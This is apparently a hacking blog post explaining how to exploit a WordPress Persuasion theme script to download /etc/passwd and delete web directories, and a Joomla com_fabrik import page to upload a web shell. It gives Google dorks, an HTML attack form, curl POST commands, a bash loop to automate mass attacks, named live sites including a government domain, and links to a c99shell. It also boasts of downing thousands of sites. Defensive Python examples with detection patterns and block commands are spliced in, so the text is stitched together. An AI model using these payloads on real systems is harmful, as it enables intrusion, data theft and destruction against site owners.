

I don't know why developers around the globe are so keen on copying and pasting code before actually checking it manually.

This is just a standard example where Security Admins/System Admins will be screwed big time.

Tip for Security Admins:

  • Have proper request checks and URL sanitization; if a request targets OS files or any file that could bring your server down, block that IP.
  • Analyze logs, and have an automated script parse them for malicious requests and IPs.
  • Keep yourself updated with the latest hacks and vulnerabilities.
  • Have an IDS for any newly installed application and check for any vulnerabilities associated with it.
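The second tip above, an automated script that parses logs for malicious requests and the IPs behind them, as an added example in Python (this is not code from the original post). The log lines are constructed in Apache combined format, the rule names and the iptables command template are my assumptions, and the indicators are the ones this post describes: the theme's dl-skin.php script, its two POST parameters, and requests naming OS files or containing traversal sequences.

```python
import re
from collections import defaultdict

# Constructed sample lines in Apache "combined" format (not taken from any real server).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2014:10:12:01 +0000] "GET /wp-content/themes/persuasion/lib/scripts/dl-skin.php HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [10/Mar/2014:10:12:03 +0000] "POST /wp-content/themes/persuasion/lib/scripts/dl-skin.php HTTP/1.1" 200 2048 "http://testing.example/test.html" "Mozilla/4.0"
198.51.100.23 - - [10/Mar/2014:10:15:44 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 404 231 "-" "curl/7.21"
192.0.2.55 - - [10/Mar/2014:10:16:10 +0000] "GET /wp-content/themes/persuasion/style.css HTTP/1.1" 200 1021 "-" "Mozilla/5.0"
192.0.2.55 - - [10/Mar/2014:10:16:11 +0000] "GET /about/ HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
"""

# One combined-format line: ip, ident, user, [time], "METHOD path proto", status, size, "referer", "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Indicators from the post: the vulnerable theme script and its POST parameter names,
# plus generic OS-file and traversal strings an admin should never see in a web request.
# Rule names are assumptions chosen for this example.
RULES = [
    ("persuasion-dl-skin", re.compile(r"/wp-content/themes/persuasion/lib/scripts/dl-skin\.php", re.I)),
    ("dl-skin-params", re.compile(r"_mysite_(download_skin|delete_skin_zip)=", re.I)),
    ("os-file", re.compile(r"(/etc/passwd|/etc/shadow|/proc/self/environ|boot\.ini|win\.ini)", re.I)),
    ("traversal", re.compile(r"(\.\./|\.\.%2f|%2e%2e%2f)", re.I)),
]


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the names of every rule matching the request path or referer."""
    haystack = entry["path"] + " " + entry["referer"]
    return [name for name, rx in RULES if rx.search(haystack)]


def analyze(log_text):
    """Return (findings, block_list).

    findings: list of (ip, method, path, matched rule names) for suspicious requests.
    block_list: sorted list of source IPs that produced at least one finding.
    """
    findings = []
    hits_by_ip = defaultdict(int)
    for line in log_text.splitlines():
        entry = parse_line(line)
        if not entry:
            continue
        rules = classify(entry)
        if rules:
            findings.append((entry["ip"], entry["method"], entry["path"], rules))
            hits_by_ip[entry["ip"]] += 1
    return findings, sorted(hits_by_ip)


def block_commands(block_list, chain="INPUT"):
    """Render the iptables rules an admin's block script would apply (returned as text, not executed)."""
    return ["iptables -I %s -s %s -j DROP" % (chain, ip) for ip in block_list]


if __name__ == "__main__":
    found, to_block = analyze(SAMPLE_LOG)
    for ip, method, path, rules in found:
        print("%-15s %-4s %s  <- %s" % (ip, method, path, ",".join(rules)))
    print("\n".join(block_commands(to_block)))
```

Run it against a real access log by reading the file into `analyze()` instead of `SAMPLE_LOG`; the POST body parameters are not in the access log, so the `dl-skin-params` rule only fires for GET requests or for a mod_security style log that records bodies.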

Enough of consultancy!!!

How to exploit?

1. Google Dork,

index:wp-content/themes/persuasion/lib/scripts/dl-skin.php

OR

inurl:wp-content/themes/persuasion/lib/scripts/


2. A test domain hosted on a server; mine was testing.com (NOT LIVE), behind TOR 😉

Add the exploit below under public_html, say as test.html:

<html>
<body>
<form action="http://vulnerable-site.com/wp-content/themes/persuasion/lib/scripts/dl-skin.php" method="post">
Existing file's name:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
Directory to be removed:<input type="text" name="_mysite_delete_skin_zip" value="/var/www"><font color=red>Use with caution: it will delete the files and directories if it is writeable</font><br>
<input type="submit" name=press value="OK">
</form>
</body>
</html>

3. You'll find /etc/passwd downloaded; check /home/ and delete it by specifying the path in the text box above.
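What the form above demonstrates is that the script takes the two parameter values as paths and uses them directly. The fix the script needed is to confine any user-supplied skin name to the skin directory before reading or deleting anything. The following is an added example of that check, not the theme's code and written in Python rather than PHP so it runs stand-alone (in PHP the same logic would be built on basename() and realpath()); the directory layout, the `.zip` allowlist and the file names are constructed assumptions.

```python
import os
import shutil
import tempfile


class UnsafePath(ValueError):
    """Raised when a user-supplied skin name would leave the skin directory."""


def resolve_inside(base_dir, user_value, allowed_ext=(".zip",)):
    """Map a user-supplied skin name onto a file that must live directly under base_dir.

    Rejects anything that is not a plain file name with an allowed extension, then
    re-checks the resolved real path so that a symlink planted in the directory
    cannot point the request somewhere else.
    """
    if not user_value or user_value != os.path.basename(user_value):
        raise UnsafePath("directory components are not allowed: %r" % user_value)
    if os.path.splitext(user_value)[1].lower() not in allowed_ext:
        raise UnsafePath("extension not allowed: %r" % user_value)
    base_real = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base_real, user_value))
    if os.path.dirname(target) != base_real:
        raise UnsafePath("resolved outside the skin directory: %r" % target)
    return target


def read_skin(base_dir, user_value):
    """The 'download' side: only a validated archive inside base_dir can be read."""
    with open(resolve_inside(base_dir, user_value), "rb") as fh:
        return fh.read()


def delete_skin(base_dir, user_value):
    """The 'delete' side: a directory path such as /var/www can never reach os.remove."""
    os.remove(resolve_inside(base_dir, user_value))
    return True


def check(base_dir, user_value):
    """True if the value would be accepted, False if the containment check rejects it."""
    try:
        resolve_inside(base_dir, user_value)
        return True
    except UnsafePath:
        return False


def demo():
    """Build a throwaway skin directory (constructed data) and exercise the checks."""
    tmp = tempfile.mkdtemp()
    skins = os.path.join(tmp, "skins")
    os.mkdir(skins)
    with open(os.path.join(skins, "blue.zip"), "wb") as fh:
        fh.write(b"PK\x03\x04 constructed placeholder archive")
    # A symlink inside the skin directory pointing at its parent: a basename-only
    # check would accept it, the realpath check must not.
    link_ok = True
    try:
        os.symlink(tmp, os.path.join(skins, "escape.zip"))
    except (OSError, NotImplementedError):
        link_ok = False
    results = {name: check(skins, name) for name in
               ("blue.zip", "/etc/passwd", "/var/www", "../../etc/passwd", "blue.php")}
    results["escape.zip"] = check(skins, "escape.zip") if link_ok else False
    results["blue_content_ok"] = read_skin(skins, "blue.zip").startswith(b"PK")
    results["deleted"] = (delete_skin(skins, "blue.zip")
                          and not os.path.exists(os.path.join(skins, "blue.zip")))
    shutil.rmtree(tmp, ignore_errors=True)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-20s %s" % (key, value))
```

The two values from the form above (`/etc/passwd` and `/var/www`) both fail at the first test because they contain directory components; the symlink case shows why the realpath comparison is still needed even after that.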


4. Imagine it's coded and automated.

You can have something like the following: create a function, say google, and search as shown below,

Command:

function google { Q="$@"; GOOG_URL='https://www.google.de/search?tbs=li:1&q='; AGENT="Mozilla/4.0"; stream=$(curl -A "$AGENT" -skLm 10 "${GOOG_URL}${Q//\ /+}" | grep -oP '\/url\?q=.+?&amp' | sed 's|/url?q=||; s|&amp||'); echo -e "${stream//\%/\x}"; }

Sample Output:

[root@BT]# google inurl:wp-content/themes/persuasion/lib/scripts/ | sed 's/scripts.*$/scripts/' | uniq
http://burlingtonventures.com/wp-content/themes/persuasion/lib/scripts
http://finseafood.com/wp-content/themes/persuasion/lib/scripts
http://www.bydelight.com/wp-content/themes/persuasion/lib/scripts
http://laforceteamwork.com/wp-content/themes/persuasion/lib/scripts
http://www.kismetdallas.com/wp-content/themes/persuasion/lib/scripts
[root@BT]#

Then you can use curl to check the HTTP status code of the above results,

URL=`google inurl:wp-content/themes/persuasion/lib/scripts/ | sed 's/scripts.*$/scripts/'`

for STATUS in $URL
do
  HTTP_STATUS_CODE=`curl -s -o /dev/null -I -w "%{http_code}" http://www.bydelight.com/wp-content/themes/persuasion/lib/scripts/dl-skin.php`
  if [ "$HTTP_STATUS_CODE" == 200 ];
  then
    curl command to post data
  else
    echo "message"
  fi
done

curl combined with formfind can be used to submit web forms, or use the command below,

[root@BT]# curl --data "_mysite_download_skin=%2Fetc%2Fpasswd&_mysite_delete_skin_zip=%2Fvar%2Fwww&press=%20OK%20" --dump-header headers http://www.testing.com/test.html

If you are unfamiliar with curl, you can use FireCurl to see the response of the curl command.

In no time, you’ll end up bringing down 2k+ websites.

Vulnerable Script: 

Cheers!!!!

Another one, 🙂

We had a recent post https://ustechnica.wordpress.com/category/security/joomla-jce-ecploit/ on one of the Joomla vulnerabilities.

Joomla's com_fabrik component gives you the power to create forms and tables that run inside Joomla without requiring knowledge of MySQL and PHP, then feed your data into Google Maps, charts or an AJAX-based calendar.

But it's vulnerable 🙂

Let's hit the road,

1. Google Dork : inurl:index.php?option=com_fabrik

If you want to narrow the search down to .com or .com.au domains, just append "site:com.au" to the above Google dork.

Example: inurl:index.php?option=com_fabrik site:com.au (this will search for the com_fabrik vulnerability on .com.au websites)

2. Once you have the list of websites,

replace the path with the link shown below,

http://www.example.com.au/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

3. You'll get something like this, and you can upload any file:

[Screenshot: comfabrik]

4. Now upload any file and, once it succeeds,

access the link of the uploaded file,

http://www.example.com.au/media/shell.php (shell.php is the name of the uploaded file)
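The import page above accepts whatever file the client names, which is why a PHP file ends up reachable under /media/. As an added example (not Fabrik's or Joomla's own code, and written in Python rather than PHP so it runs stand-alone), here are the checks a CSV import endpoint should apply before storing anything, plus a scan of an upload directory for files that have no business being there. The name pattern, the allowed-extension list, the server-side storage name and the constructed directory layout are all assumptions of this example.

```python
import csv
import io
import os
import re
import secrets
import shutil
import tempfile

# A plain name: letters, digits, '_' or '-', exactly one extension, and it must be .csv.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_-]{0,63}\.csv$")
# Byte patterns that mark server-side code; none of them belongs in a CSV import.
CODE_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")


class RejectedUpload(ValueError):
    """Raised with the reason an upload was refused."""


def validate_csv_upload(filename, data, max_bytes=2000000):
    """Accept only a plainly named .csv whose bytes are UTF-8 text that parses as a table.

    Returns the parsed rows; anything else raises RejectedUpload.
    """
    if not SAFE_NAME.match(filename):
        raise RejectedUpload("file name must be simple and end in .csv: %r" % filename)
    if len(data) > max_bytes:
        raise RejectedUpload("file too large")
    lowered = data.lower()
    if any(marker in lowered for marker in CODE_MARKERS):
        raise RejectedUpload("content contains code markers")
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        raise RejectedUpload("content is not UTF-8 text")
    if "\x00" in text:
        raise RejectedUpload("binary content")
    rows = list(csv.reader(io.StringIO(text)))
    widths = {len(r) for r in rows if r}
    if not rows or len(widths) != 1:
        raise RejectedUpload("not a consistent CSV table")
    return rows


def storage_name(filename):
    """Server-chosen name: the client's file name never becomes part of a URL under /media/."""
    return "import-%s.csv" % secrets.token_hex(8)


def find_unexpected_files(media_dir, allowed_ext=(".csv", ".jpg", ".png", ".pdf")):
    """Walk an upload directory and list every file whose extension is not allowlisted."""
    unexpected = []
    for root, _dirs, files in os.walk(media_dir):
        for name in files:
            if os.path.splitext(name)[1].lower() not in allowed_ext:
                unexpected.append(os.path.relpath(os.path.join(root, name), media_dir))
    return sorted(unexpected)


def demo():
    """Exercise the validator on constructed inputs and scan a constructed media directory."""
    good = b"id,name\n1,alice\n2,bob\n"
    not_csv = b"<?php echo 'constructed, not a csv'; ?>\n"
    results = {"good": len(validate_csv_upload("customers.csv", good))}
    for fname, blob in (("shell.php", good), ("shell.php.csv", good),
                        ("x.csv", not_csv), ("ragged.csv", b"a,b\n1\n")):
        try:
            validate_csv_upload(fname, blob)
            results[fname] = "accepted"
        except RejectedUpload as exc:
            results[fname] = "rejected: " + str(exc)
    results["storage_name_ok"] = bool(re.match(r"^import-[0-9a-f]{16}\.csv$",
                                               storage_name("customers.csv")))
    # Constructed media directory: two legitimate uploads and two files that should not be there.
    media = tempfile.mkdtemp()
    os.mkdir(os.path.join(media, "cache"))
    for rel in ("report.csv", "logo.png", "shell.php", os.path.join("cache", "x.phtml")):
        with open(os.path.join(media, rel), "wb") as fh:
            fh.write(b"constructed placeholder\n")
    results["unexpected"] = find_unexpected_files(media)
    shutil.rmtree(media, ignore_errors=True)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-16s %s" % (key, value))
```

Point `find_unexpected_files()` at a real media directory to audit it; an import endpoint that has already been abused usually shows up as a `.php` or `.phtml` file sitting among CSV and image uploads.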

5. Example of the vulnerable sites,

http://prdbihar.gov.in/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1

6. You can download one of the files below and upload it through the com_fabrik vulnerability,

http://www.2shared.com/file/6yFs_FG_/c99shell.html

http://pastebin.com/tfhHcPE0